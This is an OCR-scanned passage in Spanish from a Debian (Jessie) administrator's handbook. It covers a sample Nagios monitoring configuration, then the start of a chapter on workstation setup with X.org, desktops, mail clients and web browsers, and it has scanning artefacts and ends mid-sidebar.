derivar  de  los  objetos  genericos  proporcionados.  Los  archivos  en  /etc/nagios3/conf .  d/  son 
una  buena  fuente  de  informacion  sobre  como  funcionan. 
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Los  administradores  de  Falcot  Corp  utilizan  la  siguiente  configuracion: 


Ejemplo  12.3  Archivo  / etc/ nagios3/ conf .  d/  falcot .  cfg 


define  contact{ 
name 

servicenotif icationperiod 
host  notification  period 
service  notification  options 
host  notification  options 
servicenotif icationcommands 
host  notification  commands 
register 


generic-contact 

24x7 

24x7 

w,u,c,  r 

d ,  u ,  r 

notify- service -by -email 
notify -host -by -email 
0  ;  Solo  plantilla 


} 

define  contact{ 
use 

contactname 

alias 

email 


generic-contact 
rhertzog 
Raphael  Hertzog 
hertzog@debian .org 


} 

define  contact{ 
use 

contactname 

alias 

email 


generic-contact 

rmas 

Roland  Mas 
lolando@debian .org 


} 


define  contactgroup{ 
contactgroupname 
alias 
members 


falcot-admins 
Falcot  Administrators 
rhertzog ,  rmas 


define  host{ 
use 

hostname 

alias 

address 

contact  groups 
hostgroups 

} 

define  host{ 
use 

hostname 

alias 

address 

contact  groups 
hostgroups 

} 


generic-host  ;  Nombre  de  la  plantilla  de  host  a  utilizar 

www- host 

www. falcot . com 

192.168.0.5 

falcot-admins 

debian- servers, ssh- servers 


generic-host  ;  Nombre  de  la  plantilla  de  host  a  utilizar 

ftp- host 

ftp . falcot . com 

192.168.0.6 

falcot-admins 

debian -servers, ssh -servers 
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#  orden  'check  ftp'  con  parametros  personalizados 
define  command{ 

commandname  check_ftp2 

command  line  /usr/lib/nagios/plugins/check  ftp  -H  $HOSTADDRESS$  -w  20  -c 

30  -t  35 

} 


#  Servicio  generico  de  Falcot 
define  service{ 

name  falcot-service 

use  generic- service 

contact  groups  falcot-admins 

register  0 

} 


#  Servicios  a  chequear  en 
define  service{ 
use 

hostname 

servicedescription 
check  command 


www- host 

falcot-service 
www- host 
HTTP 

checkhttp 


define  service{ 
use 

hostname 

servicedescription 

checkcommand 

} 

define  service{ 
use 

hostname 

servicedescription 
check  command 


falcot-service 
www- host 
HTTPS 

checkhttps 


falcot-service 
www- host 
SMTP 

checksmtp 


#  Servicios  a  chequear  en  ftp-host 
define  service{ 
use 

hostname 

servicedescription 
check  command 


} 


falcot-service 
ftp- host 
FTP 

check_ftp2 


Este  archivo  de  configuracion  describe  dos  equipos  monitorizados.  El  primero  es  el  servidor  web, 
y  se  realizan  chequeos  en  los  puertos  HTTP  (80)  y  HTTP  seguro  (443).  Nagios  tambien  revisa 
que  el  servidor  SMTP  ejecute  en  el  puerto  25.  El  segundo  equipo  es  el  servidor  FTP  y  el  chequeo 
incluye  asegurarse  que  responda  en  menos  de  20  segundos.  Mas  alia  de  esta  demora,  se  generara 
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un  <.<waming»  («precaucion»);  mas  de  30  segundos  generara  una  alerta  critica.  La  interfaz  web 
tambien  muestra  que  se  monitoriza  el  servicio  SSH:  esto  proviene  de  los  equipos  que  pertenecen 
al  «hostgroup»  ssh-servers.  El  servicio  estandar  asociado  esta  definido  en  /etc/nagios3/conf . 
d/services_nagios2 . cfg. 

Vera  como  utilizamos  herencia:  un  objeto  hereda  de  otro  objeto  con  la  propiedad  «use  nombre- 
padre».  Debemos  poder  identificar  al  objeto  padre,  lo  que  requiere  incluir  en  el  una  propiedad 
«name  identificador».  Si  no  deseamos  que  el  objeto  padre  sea  un  objeto  real,  sino  que  solo  sirva 
como  padre,  agregar  una  propiedad  «register  0»  le  indica  a  Nagios  que  no  lo  considere  y,  por  lo 
tanto,  ignore  la  falta  de  algunos  parametros  que  serian  obligatorios. 


DOCUMENTACION  Puede  obtener  informacion  mas  detallas  sobre  las  muchas  formas  en  las  que  puede 
Lista  de  propiedades  de  configurar  Nagios  en  la  documentacion  que  provee  el  paquete  nagios3-doc.  Puede 
objetos  acceder  directamente  a  esta  documentacion  desde  la  interfaz  web  con  el  enlace 
«Documentacion»  en  la  esquina  superior  izquierda.  Esta  incluye  una  lista  de  todos 
los  tipos  de  objetos  as!  como  tambien  las  propiedades  que  pueden  tener.  Tambien 
explica  como  crear  nuevos  plugins. 


YENDOMAsallA  Muchos  plugins  de  Nagios  permiten  chequear  parametros  locales  de  un  equipo; 

Pruebas  remotas  con  s'  much33  maquinas  necesitan  estos  chequeos  para  que  los  recolecte  una  instala- 
NRPE  c'°n  centrat  necesita  desplegar  el  plugin  NRPE  (ejecucion  remota  de  plugins  de 
Nagios ■■  «Nagios  Remote  Plugin  Executor»).  Necesitara  instalar  el  paquete  nagios- 
nrpe-plugin  en  el  servidor  Nagios  y  el  paquete  nagios-n rpe-server  en  los  equipos 
sobre  los  que  ejecutara  los  tests  locales.  Este  ultimo  obtendra  su  configuracion  del 
archivo  /etc/nagios/nrpe  .  cfg.  Este  archivo  debe  enumerar  las  pruebas  que  pue¬ 
de  iniciarse  remotamente  y  las  direcciones  IP  de  las  maquinas  que  puede  ejecutar- 
las.  Del  lado  de  Nagios,  activar  estas  pruebas  remotas  es  tan  simple  como  agregar 
los  servicios  apropiados  utilizando  el  nuevo  «command»  check  nrpe. 
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Palabras  clave 


Estacion  de  trabajo 
Escritorio  grafico 
Trabajo  de  oficina 
X.org 


Capftulo 


Estacion  de  trabajo 


Contenidos 

Configuracion  del  servidor  XII  378  Personalizacion  de  la  interfaz  grafica  379  Escritorios  graficos  381 

Correo  384  Navegadores  web  387  Desarrollo  388  Trabajo  colaborativo  389  Suites  de  oficina  390 

Emulacion  de  Windows:  Wine  391  Software  de  comunicaciones  en  tiempo  real  392 


Ahora  queya  se  desplegaron  los  servidores,  los  administradores  pueden  enfocarse  en  instalar  las 
estaciones  de  trabajo  individuates y  crear  una  configuracion  tipica. 


13.1  Configuracion  del  servidor  X1 1 


La  configuracion  inicial  de  la  interfaz  grafica  a  veces  puede  ser  extrana;  tarjetas  de  video  muy 
recientes  muchas  veces  no  funcionan  perfectamente  con  la  version  de  X.org  que  se  encuentra 
en  la  version  estable  de  Debian. 

Un  breve  recordatorio:  X.org  es  el  componente  de  software  que  permite  que  las  aplicaciones 
graficas  muestren  ventanas  en  la  pantalla.  Incluye  un  controlador  que  utiliza  la  tarjeta  de  video 
de  forma  eficiente.  Se  exporta  la  funcionalidad  ofrecida  a  las  aplicaciones  graficas  a  traves  de 
una  interfaz  estandar,  Xll  (Jessie  contiene  la  version  X11R7.7). 


PERSPECTIVA  XII  es  el  sistema  grafico  mas  utilizado  en  sistemas  tipo  Unix  (tambien  disponible 
XII  XFree86  y  X  org  en’  ademas  del  sistema  nativo,  Windows  y  Mac  OS).  Estrictamente  hablando,  el 
termino  «X11»  solo  se  refiere  a  la  especificacion  del  protocolo,  pero  en  la  practica 
tambien  se  lo  utiliza  para  referirse  a  la  implementacion. 

Xll  tuvo  un  comienzo  escabroso,  pero  XFree86  surgio  en  los  1990s  como  la  imple¬ 
mentacion  de  referencia  porque  era  software  libre,  portable  y  mantenido  de  forma 
colaborativa  por  su  comunidad.  Sin  embargo,  la  velocidad  de  evolucion  se  redujo 
hacia  el  final  cuando  el  software  solo  obtenfa  nuevos  controladores.  Dicha  situa- 
cion,  junto  con  el  controvertido  cambio  de  licencia  llevo  a  la  bifurcacion  en  X.org 
en  2004.  Esta  es  ahora  la  implementacion  de  referencia  y  Debian  Jessie  utiliza  la 
version  7.7  de  X.org. 


Las  versiones  actuales  de  X.org  pueden  detectar  automaticamente  el  hardware  disponible:  tan- 
to  la  tarjeta  de  video  y  el  monitor  como  el  teclado  y  raton;  de  hecho,  es  tan  conveniente  que  el 
paquete  ya  no  crea  un  archivo  de  configuracion  /et  c/Xll/xo  rg .  conf .  Todo  esto  es  posible  gra- 
cias  a  las  funcionalidades  que  provee  el  nucleo  Linux  (en  particular  para  teclados  y  ratones),  en 
el  que  cada  controlador  indica  con  que  tarjetas  de  video  es  compatible  y  utilizando  el  protocolo 
DDC  para  obtener  las  caracteristicas  del  monitor. 

Actualmente,  la  configuracion  del  teclado  esta  definida  en  /etc/def  ault/keyboa  rd.  Se  utiliza 
este  archivo  tanto  para  configurar  la  consola  de  texto  como  la  interfaz  grafica  y  es  gestionado 
por  el  paquete  keyboard-configuration.  Puede  encontrar  detalles  sobre  la  configuracion  del  tecla¬ 
do  en  la  Seccion  8.1.2,  «Configuracion  del  teclado»  pagina  155. 

El  paquete  xserver-xorg-core  provee  un  servidor  X  generico,  como  el  utilizado  en  las  versiones  7.x 
de  X.org.  Este  servidor  es  modular  y  utiliza  un  conjunto  de  controladores  independientes  para 
gestionar  la  gran  variedad  de  tipos  de  tarjetas  de  video.  Instalar  xserver-xorg  le  asegurara  que  se 
instale  tanto  el  servidor  como  al  menos  un  controlador  de  video. 

Sepa  que  si  la  tarjeta  de  video  detectada  no  es  compatible  con  ninguno  de  los  controladores 
disponibles,  X.org  intentara  utilizar  los  controladores  VESA  y  fbdev.  El  primero  es  un  contro¬ 
lador  generico  que  deberfa  funcionar  siempre,  pero  con  capacidades  limitadas  (menos  resolu- 
ciones  disponibles,  sin  aceleracion  por  hardware  para  juegos  o  efectos  visuales  del  escritorio, 
etc.)  mientras  que  el  ultimo  funciona  sobre  el  dispositivo  «framebuffer»  del  nucleo.  El  servidor 
X  escribe  sus  mensajes  al  archivo  de  registro  /va  r/log/Xo  rg  .  0 .  Log,  donde  uno  buscaria  para 
saber  que  controlador  esta  utilizando  actualmente.  Por  ejemplo,  el  siguiente  extracto  coincide 
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con  la  salida  de  cuando  se  carga  el  controlador  intel: 

(==)  Matched  intel  as  autoconfigured  driver  0 
(==)  Matched  modesetting  as  autoconfigured  driver  1 
(==)  Matched  vesa  as  autoconfigured  driver  2 
(==)  Matched  fbdev  as  autoconfigured  driver  3 
(==)  Assigned  the  driver  to  the  xf 86ConfigLayout 
(II)  LoadModule:  "intel" 

(II)  Loading  /usr/lib/xorg/modules/d rivers/intel  drv . so 


EXTRA  Algunos  fabricantes  de  tarjetas  de  video  (mas  notablemente,  nVidia)  se  niegan  a 
Controladores  privativos  publicar  las  especificaciones  de  hardware  que  son  necesarias  para  implementar 

buenos  controladores  libres.  Si  proveen,  sin  embargo,  controladores  privativos  que 
permiten  utilizar  su  hardware.  Esta  politica  es  nefasta  ya  que  aun  cuando  existen 
los  controladores  necesarios,  generalmente  no  estan  tan  pulidos  como  deberian;  lo 
que  es  mas  importante,  no  siguen  necesariamente  las  actualizaciones  de  X.org,  lo 
que  podria  evitar  que  cargue  correctamente  (o  por  completo)  el  ultimo  controlador 
disponible.  No  podemos  justificar  este  comportamiento  y  recomendamos  que  evite 
a  estos  fabricantes  en  favor  de  aquellos  mas  cooperativos. 

Si  aun  asi  termina  con  una  de  estas  tarjetas,  encontrara  los  paquetes  necesarios 
en  la  seccion  non-free :  nvidia-gtx  para  tarjetas  nVidia  y  fglrx-driver  para  algunas 
tarjetas  ATI.  En  ambos  casos  necesitara  los  modulos  de  nucleo  correspondientes. 
Puede  automatizar  la  compilacion  de  estos  modulos  con  la  instalacion  de  los  pa¬ 
quetes  nvidia-kernel-dkms  (para  nVidia)  o  fgirx-modules-dkms  (para  ATI). 

El  proyecto  «nouveau»  intenta  desarrollar  un  controlador  que  sea  software  libre 
para  las  tarjetas  nVidia.  Desde  Jessie,  su  conjunto  de  funcionalidad  no  alcanza  al 
controlador  privativo.  En  defensa  de  los  desarrolladores  debemos  mencionar  que  so¬ 
lo  pueden  conseguir  la  informacion  necesaria  con  ingenieria  inversa,  lo  que  dificulta 
la  cuestion.  El  controlador  libre  para  las  tarjetas  de  video  ATI,  llamado  «radeon», 
es  mucho  mejor  en  dicho  aspecto  pero  generalmente  necesita  firmware  privativo. 


13.2.  Personalizacion  de  la  interfaz  grafica 

13.2.1.  Eleccion  de  un  gestor  de  pantalla 

La  interfaz  grafica  solo  provee  un  espacio  en  la  pantalla.  Ejecutar  unicamente  el  servidor  X  solo 
le  llevara  a  una  pantalla  vacfa,  razon  por  la  que  la  mayoria  de  las  instalaciones  utilizan  un  gestor 
de  pantalla  («Display  Manager»)  para  mostrar  la  pantalla  de  autenticacion  de  usuarios  e  iniciar 
el  escritorio  grafico  una  vez  que  se  autentico  el  usuario.  Los  tres  gestores  de  pantalla  mas  po- 
pulares  utilizados  actualmente  son  gdm3  ( GNOME  Display  Manager),  kdm  ( KDE  Display  Manager )  y 
lightdm  (Light  Display  Manager) .  Debido  a  que  los  administradores  de  Falcot  Corp  eligieron  utili¬ 
zar  el  entorno  de  escritorio  GNOME,  logicamente  seleccionaron  gdm3  como  gestor  de  pantalla 
tambien.  El  archivo  de  configuracion  /etc/gdm3/daemon .  conf  tiene  muchas  opciones  (puede 
encontrar  la  lista  en  el  archivo  de  esquemas  /us  r/sha  re/gdm/gdm .  schemas)  para  controlar  su 
comportamiento  y  el  archivo  /etc/gdm3/greeter.dconf-defaults  contiene  la  configuracion 
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de  la  «sesion»  de  inicio  (es  mas  que  solo  una  pantalla  para  inicio  de  sesion,  es  un  escritorio  li- 
mitado  con  herramientas  de  accesibilidad  y  gestion  de  energfa).  Tenga  en  cuenta  que  puede 
personalizar  las  opciones  mas  utiles  para  los  usuarios  desde  el  centro  de  control  de  GNOME. 


13.2.2.  Eleccion  de  un  gestor  de  ventanas 

Debido  a  que  cada  escritorio  grafico  provee  su  propio  gestor  de  ventanas,  elegir  el  primero  gene- 
ralmente  implica  una  eleccion  de  software  para  el  ultimo.  GNOME  utiliza  el  gestor  de  ventanas 
mutter, KDEutiliza  kwin  y  Xfce  (que  presentaremos  mas  adelante)  utiliza  xfwm.  La filosofia Unix 
siempre  permitio  utilizar  el  gestor  de  ventanas  que  uno  prefiera,  pero  utilizar  los  recomenda- 
dos  permite  que  un  administrador  aproveche  mejor  los  esfuerzos  de  integracion  que  realiza 
cada  proyecto. 


VOLVER  A  LOS  CIMIENTOS  Continuando  la  tradicion  Unix  de  solo  hacer  una  cosa  pero  hacerla  bien,  el  gestor  de 
Gestor  de  ventanas  ventanas  muestra  las  «decoraciones»  alrededor  de  las  ventanas  que  pertenecen  a 
las  aplicaciones  que  estan  ejecutando  actualmente,  lo  que  incluye  marcos  y  la  barra 
de  titulo.  Tambien  permite  reducir,  restaurar,  maximizar  y  esconder  ventanas.  La 
mayoria  de  los  gestores  de  ventanas  tambien  proveen  un  menu  que  aparece  cuando 
se  pulsa  el  escritorio  de  una  forma  especifica.  Este  menu  provee  una  forma  de  cerrar 
la  sesion  del  gestor  de  ventanas,  iniciar  nuevas  aplicaciones  y,  en  algunos  casos, 
cambiar  a  otro  gestor  de  ventanas  (si  hay  algun  otro  instalado). 


Para  los  equipos  mas  antiguos,  sin  embargo,  es  mas  complicado  ejecutar  entornos  graficos  de 
escritorio  pesados.  En  estos  casos,  deberia  utilizar  una  configuracion  mas  ligera.  Gestores  de  ven¬ 
tanas  «ligeros»  (con  una  pequena  carga)  incluyen:  WindowMaker  (en  el  paquete  wmaker),  Afters¬ 
tep,  fvwm,  icewm,  blackbox,  fluxbox  u  openbox.  En  estos  casos,  debera  configurar  el  sistema  pa¬ 
ra  que  el  gestor  de  ventanas  apropiado  tenga  precedencia;  la  forma  estan dar  es  cambiar  la  alter- 
nativa  x-window-manager  ejecutando  update-alternatives  -  -config  x-window-manager. 


ESPEClFICO  EN  DEBIAN  La  normativa  Debian  enumera  una  cantidad  de  ordenes  estandarizadas  para  eje- 
Alternativas  cutar  una  accion  particular.  Por  ejemplo,  la  orden  x-window-manager  ejecuta  el 
gestor  de  ventanas.  Pero  Debian  no  asigna  esta  orden  a  un  gestor  de  ventanas  par¬ 
ticular.  El  administrador  puede  elegir  que  gestor  de  ventanas  debe  ejecutar. 

Para  cada  gestor  de  ventanas,  el  paquete  relevante  registra  el  programa  relevante 
como  una  opcion  posible  para  x-window-manager  junto  con  la  prioridad  asociada. 
Siempre  que  no  existan  configuraciones  explicitas  por  el  administrador,  esta  prio¬ 
ridad  permite  seleccionar  el  mejor  gestor  de  ventanas  instalado  cuando  se  ejecuta 
la  orden  generica. 

Tanto  registrar  un  programa  como  configurarlo  explicitamente  involucran  el  script 
update -aLternatives.  Seleccionar  a  donde  apunta  una  orden  simbolica  es  simple- 
mente  cuestion  de  ejecutar  update-alternatives  -  -config  orden- simbolica. 
El  script  update-alternatives  crea  (y  administra)  enlaces  simbolicos  en  el  di- 
rectorio  /etc/alternatives/  que,  a  su  vez,  referencia  la  ubicacion  del  ejecutable. 
Con  el  paso  del  tiempo,  se  instalaran  o  eliminaran  paquetes  y/o  el  administrador  ha- 
ra  cambios  explicitos  a  la  configuracion.  Cuando  se  elimina  el  paquete  que  provee 
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una  alternativa,  esta  automaticamente  deriva  en  la  siguiente  mejor  opcion  entre 
los  programas  disponibles  que  continuan  instalados. 

La  normativa  Debian  no  enumera  explfcitamente  todas  las  ordenes  simbolicas;  al- 
gunos  encargados  de  paquetes  Debian  deliberadamente  eligieron  utilizar  este  me- 
canismo  en  casos  menos  directos  en  los  que  provee  una  flexibilidad  interesante  (los 
ejemplos  incluyen  x-www-browser,  www-browser,  cc,  C++,  awk,  etc.). 


13.2.3.  Gestion  del  menu 

Los  entornos  de  escritorio  modernos  y  muchos  gestores  de  ventanas  proveen  menus  que  enu- 
meran  las  aplicaciones  disponibles  al  usuario.  Para  poder  mantenerlos  actualizados  en  relacion 
al  conjunto  real  de  aplicaciones  disponibles,  normalmente  cada  paquete  proporciona  un  fiche- 
ro  .desktop  en  /us r/sha re/applications.  El  formato  de  los  cuales  ha  sido  estandarizado  por 
FreeDesktop.org: 

http : //standards . freedesktop . org/desktop -entry- spec/latest/ 

Los  menus  de  las  aplicaciones  pueden  ser  personalizados  por  los  administradores  mediante  fi- 
chero  de  configuracion  del  sistema,  tal  y  como  se  explica  en  la  ’’Especificacion  de  Menu  de  Escri¬ 
torio”.  Los  usuarios  finales  tambien  pueden  personalizar  los  menus  con  herramientas  graficas, 
tales  como  kmenuedit  (en  KDE),  alacarte  (en  GNOME)  or  menulibre. 

http : //standards . freedesktop . org/menu- spec/latest/ 


HISTORIA  Historicamente  --  mucho  antes  de  que  surgieran  los  estandares  de  FreeDesktop.org 
El  sistema  de  menus  de  ~  Debian  habia  inventado  su  propio  sistema  de  menus,  donde  cada  paquete  propor- 
Debian  cionaba  una  descripcion  generica  de  las  entradas  de  menu  en  /usr/share/menu/. 

Esta  herramienta  todavia  esta  disponible  en  Debian  (  en  el  paquete  menu)  pero 
se  usa  marginalmente,  ya  que  los  reponsable  aconsejan  confiar  en  los  ficheros 
.  desktop. 


13.3.  Escritorios  graficos 

El  campo  de  escritorios  graficos  libres  es  dominado  por  dos  grandes  colecciones  de  software: 
GNOME  y  KDE.  Ambos  son  muy  populares.  Esto  es  algo  raro  en  el  mundo  del  software  libre;  el 
servidor  web  Apache,  por  ejemplo,  tiene  pocos  pares. 

Esta  diversidad  tiene  un  origen  historico.  KDE  fue  el  primer  proyecto  de  escritorio  grafico  pero 
eligio  las  herramientas  graficas  Qt,  una  eleccion  que  no  era  aceptable  para  una  gran  cantidad  de 
desarrolladores.  Qt  no  era  software  libre  en  aquel  entonces  y  GNOME  comenzo  basandose  en  las 
herramientas  GTK+.  Qt  se  convirtio  en  software  libre  mientras  tanto,  pero  los  proyectos  nunca 
se  fusionaron  y,  en  cambio,  evolucionaron  en  paralelo. 

GNOME  y  KDE  todavia  trabajan  juntos:  bajo  el  ala  de  FreeDesktop.org,  los  proyectos  colaboran 
en  la  definicion  de  estandares  de  interoperatividad  entre  aplicaciones. 
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Elegir  «el  mejor»  escritorio  grafico  es  un  tema  sensible  que  preferimos  evitar.  Simplemente 
describiremos  las  muchas  posibilidades  y  proveeremos  algunas  ideas  para  considerar.  La  mejor 
opcion  es  aquella  que  tome  por  su  cuenta  luego  de  un  poco  de  experimentation. 


13.3.1.  GNOME 

Debian  Jessie  incluye  GNOME  version  3.14,  que  puede  instalar  con  apt -get  install  gnome 
(tambien  puede  instalarlo  si  selecciona  la  tarea  «Entorno  de  escritorio  Debian»). 

GNOME  es  notable  por  sus  esfuerzos  en  cuanto  a  usabilidad  y  accesibilidad.  Profesionales  de  di- 
seno  estuvieron  involucrados  en  la  escritura  de  estandares  y  recomendaciones.  Esto  ayudo  a  los 
desarrolladores  a  crear  interfaces  graficas  de  usuario  satisfactorias.  El  proyecto  tambien  obtiene 
estimo  de  grandes  miembros  de  la  informatica  como  Intel,  IBM,  Oracle,  Novell  y,  por  supuesto, 
varias  distribuciones  Linux.  Finalmente,  puede  utilizar  muchos  lenguajes  de  programacion  para 
desarrollar  aplicaciones  que  interactuen  con  GNOME. 


Figura  13.1  El  escritorio  GNOME 


Para  los  administadores,  GNOME  parece  estar  mejor  preparado  para  despliegues  masivos.  La 
configuracion  de  la  aplicacion  se  gestiona  a  traves  del  interfaz  GSettings,  y  almacena  sus  datos 
en  la  base  de  datos  DConf.  La  configuracion  puede  consultarse  y  editarse  con  las  herramientas 
de  linea  de  comando  gsettings  y  dconf  ,  o  mediante  el  interfaz  de  usuario  de  dconf -editor. 
Por  lo  tanto,  el  administrador  puede  modificar  la  configuracion  de  los  usuarios  con  un  simple 

https://help.gnome.org/admin/ 
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13.3.2.  KDE 


Debian Jeesie  incluye  la  version  4.14  de  KDE,  que  puede  instalar  con  apt  -  get  install  kde  -  sta 
ndard. 

KDE  tuvo  una  evolucion  rapida  basandose  en  un  enfoce  muy  practico.  Sus  autores  obtuvieron 
muy  buenos  resultados  rapidamente,  lo  que  les  permitio  obtener  una  gran  base  de  usuarios. 
Estos  factores  contribuyeron  a  la  calidad  general  del  proyecto.  KDE  es  un  entorno  de  escritorio 
perfectamente  maduro  con  un  amplio  rango  de  aplicaciones. 


Figura  13.2  El  escritorio  KDE 


Con  la  publicacion  de  Qt  4.0  desaparecio  el  ultimo  problema  de  licencias  de  KDE.  Se  publico  esta 
version  bajo  la  GPL  tanto  para  Linux  como  para  Windows  (anteriormente,  la  version  de  windows 
se  encontraba  bajo  una  licencia  privativa).  Sepa  que  se  deben  desarrollar  las  aplicaciones  KDE 
con  el  lenguaje  C++. 


13.3.3.  Xfce  y  otros 

XFce  es  un  escritorio  grafico  simple  y  liviano,  ideal  para  equipos  con  recursos  limitados.  Puede 
instalarlo  con  apt  -  get  install  xf  ce4.  Al  igual  que  GNOME,  Xfce  estabasado  enlas  herramien- 
tas  GTK+y  ambos  escritorios  comparten  varios  componentes. 

A  diferencia  de  GNOME  y  KDE,  Xfce  no  tiene  como  objetivo  ser  un  gran  proyecto.  Mas  alia  de  los 
componentes  basicos  de  un  escritorio  moderno  (gestor  de  archivos,  gestor  de  ventanas,  gestor 
de  sesiones,  panel  para  lanzadores  de  aplicaciones,  etc.),  solo  provee  unas  pocas  aplicaciones 
especfficas:  un  terminal,  un  calendario  (Orage),  un  visor  de  imagenes,  una  herramienta  de  gra- 
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bacion  de  CD/DVD,  un  reproductor  de  medios  (Parole),  un  control  de  volumen  de  sonido  y  un 
editor  de  texto  (mousepad). 


Figura  13.3  El  escritorio  Xfce 


Otro  entorno  de  escritorio  que  provee  Jessie  es  LXDE,  el  cual  se  enfoca  en  el  aspecto  «ligero». 
Puede  instalarlo  con  ayuda  del  metapaquete  Ixde. 


13.4  Correo 

13.4.1.  Evolution 


COMUNIDAD  Si  instala  el  paquete  popularity-contest  puede  participar  en  una  encuesta  automa- 
Paquetes  populares  tica  tlue  'nf°rma  al  proyecto  Debian  sobre  los  paquetes  mas  populares.  Semanal- 
mente  cron  ejecutara  un  script  que  enviara  (a  traves  de  HTTP  o  correo)  una  lista 
anonima  de  los  paquetes  instalados  y  la  fecha  del  ultimo  acceso  a  los  archivos  que 
contienen.  Esto  permite  diferenciar,  entre  aquellos  paquetes  instalados,  a  aquellos 
que  realmente  utiliza. 

Esta  informacion  es  de  gran  ayuda  al  proyecto  Debian.  La  utiliza  para  determinar 
que  paquetes  deben  estar  en  el  primer  disco  de  instalacion.  Los  datos  de  instalacion 
tambien  son  un  factor  importante  en  la  decision  sobre  la  eliminacion  de  la  distribu- 
cion  de  un  paquete  con  muy  pocos  usuarios.  Recomendamos  sinceramente  instalar 
el  paquete  popularity-contest  y  participar  en  la  encuesta. 

Todos  los  dfas  se  publican  los  datos  recolectados. 

•-  http://popcon.debian.org/ 

Estas  estadfsticas  tambien  puede  ayudar  a  elegir  entre  dos  paquetes  que,  de  otra 
forma,  parecerian  equivalentes.  Elegir  el  paquete  mas  popular  aumenta  la  probabi- 
lidad  de  realizar  una  buena  eleccion. 
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Evolution  es  el  cliente  de  correo  de  GNOME  y  lo  puede  instalar  con  apt -get  install 
evolution.  Evolution  es  mas  que  un  simple  cliente  de  correo,  tambien  provee  un  calendario, 
libreta  de  direcciones,  lista  de  tareas  y  una  aplicacion  de  notas  (de  texto  libre).  Su  componen- 
te  de  correo  incluye  un  poderoso  sistema  de  indexacion  que  permite  crear  carpetas  virtuales 
basadas  en  consul tas  de  busqueda  sobre  todos  los  mensajes  archivados.  En  otras  palabras,  se 
almacenan  todos  los  mensajes  de  la  misma  forma  pero  se  los  muestra  organizados  en  carpetas, 
cada  una  de  las  cuales  contiene  los  mensajes  que  coinciden  con  un  filtro  particular. 


Bandeja  de  entrada  (O  en  total)  -  Evolution 
Archivo  Editar  Ver  Mensaje  Carpeta  Buscar  Ayuda 

|_|  Nuevo  @  Enviar  /  Recibir  ▼  ££  Responder  Responder  al  grupo  ▼  Reenviar  »  B  i  S  Q 


@  Bandeja  de  entrada  0  en  total  Mostrar:  Todos  los  correos  v  Buscar:  Q  El  asunto  o  Las  direccione  en  Carpeta  actual 


-  En  este  equipo  1  c3  1  ®  1  O  De  Asunto  1  Fecha 

|~)  Bandeja  de  salida 

l^fBorradores 

13  Correo  enviado 

n  Drafts 

®  Papelera 

0  PLantillas 

5^  SPAM 

w  Carpetas  de  busqueda 

ESNo  coincidente 

No  hay  mensajes  en  esta  carpeta. 

1  ED  Correo 

Contactos 

^  Calendario 

U  Tareas 

^  Notas 

Figura  13.4  El  software  de  correo  Evolution 


Una  extension  de  Evolution  permite  integrarlo  al  sistema  de  correos  Microsoft  Exchange;  el 
paquete  necesario  es  evolution-ews. 


13.4.2.  KMail 


Puede  instalar  el  software  de  correo  de  KDE  con  apt -  get  install  kmail.  KMail  solo  gestiona 
correo,  pero  pertenece  a  un  conjunto  de  software  llamado  KDE-PIM  ( gestor  de  information  perso¬ 
nal:  «Personal  Information  Manager»)  que  incluye  funcionalidades  como  libretas  de  direcciones, 
un  componente  de  calendario,  etc.  KMail  tiene  toda  la  funcionalidad  que  uno  podria  esperar  de 
un  excelente  cliente  de  correo. 
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Figura  13.5  El  software  de  correo  KMail 


13.4.3,  Thunderbird  y  Icedove 

Este  software  de  correo,  incluido  en  el  paquete  icedove,  es  parte  del  conjunto  de  software  de 
Mozilla.  Se  encuentran  disponibles  varios  conjuntos  de  localizacion  en  los  paquetes  icedove-llOn- 
*;  la  extension  enigmail  gestiona  la  firma  y  cifrado  de  mensajes  (pero  no  esta  disponible  en  todos 
los  idiomas). 


^Recibir  mensajes  -  {J  Redactor  t=)Ch«rUr  [§)  Directions  |  Etiqucta-  QFiltro  ripido  |  Euscar.  .  <Ct.H-K>  ~a|  = 


Figura  13.6  El  software  de  correo  Icedove 


Thunderbird  es  uno  de  los  mejores  clientes  de  correo  y  parece  ser  un  gran  exito,  al  igual  que 
Mozilla  Firefox. 

Estrictamente  hablando,  Debian  Jessie  contiene  Icedove,  no  Thunderbird,  por  cuestiones  legales 
que  detallaremos  en  la  barra  lateral  «Iceweasel,  Firefox  y  otros»  pagina  388;  pero,  excepto  por 
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el  nombre  (e  fconos),  no  hay  diferencias  reales  entre  ambos. 


13.5.  Navegadores  web 

Epiphany,  el  navegador  web  de  GNOME,  utiliza  el  motor  de  visualizacion  Webkit  desarrollado 
por  Apple  para  su  navegador  Safari.  El  paquete  relevante  es  epiphany-browser. 

Konqueror,  el  gestor  de  archivos  de  KDE,  tambien  se  comporta  como  un  navegador  web.  Utiliza 
el  motor  de  visualizacion  KHTML,  especifico  de  KDE;  KEITML  es  un  motor  excelente,  como  evi- 
dencia  el  hecho  de  que  WebKit  de  Apple  esta  basado  en  KHTML.  Konqueror  esta  disponible  en 
el  paquete  konqueror. 

Los  usuarios  que  no  esten  satisfechos  con  ninguno  de  los  anteriores  pueden  utilizar  Iceweasel. 
Este  navegador,  disponible  en  el  paquete  iceweasel,  utiliza  el  visualizador  Gecko  del  proyecto 
Mozilla,  con  una  interfaz  delgada  y  extensible  sobre  el. 
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Figura  13.7  El  navegador  web  Iceweasel 


CULTURA  Netscape  Navigator  era  el  navegador  estandar  cuando  la  web  comenzo  a  llegar  a 
Mozilla  ^as  masas>  Pero  fue  dejado  atras  progresivamente  cuando  surgio  Microsoft  Internet 
Explorer.  Frente  a  este  fracaso,  Netscape  (la  empresa)  decidio  «liberar»  su  codigo 
fuente,  publicandolo  bajo  una  licencia  libre,  para  darle  una  segunda  vida.  Este  fue 
el  comienzo  del  proyecto  Mozilla.  Luego  de  muchos  anos  de  desarrollo,  los  resul- 
tados  son  mas  que  satisfactorios:  el  proyecto  Mozilla  llevo  adelante  un  motor  de 
visualizacion  HTML  (llamado  Gecko)  que  se  encuentra  entre  los  mas  compatibles 
con  estadares.  En  particular,  este  motor  de  visualizacion  es  utilizado  por  el  navega¬ 
dor  Mozilla  Firefox,  uno  de  los  navegadores  mas  existosos  con  una  base  de  usuarios 
que  crece  rapidamente. 
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CULTURA  Sin  duda,  muchos  usuarios  estaran  sorprendidos  por  la  ausencia  de  Mozilla  Firefox 
Iceweasel  Firefox  y  otros  en  ^os  menl-ls  de  Debian  Jessie.  No  hay  necesidad  de  entrar  en  panico:  el  paquete 

iceweasel  contiene  Iceweasel,  que  es  basicamente  Firefox  bajo  otro  nombre. 

La  razon  detras  de  este  cambio  de  nombre  es  el  resultado  de  las  reglas  de  uso  im- 
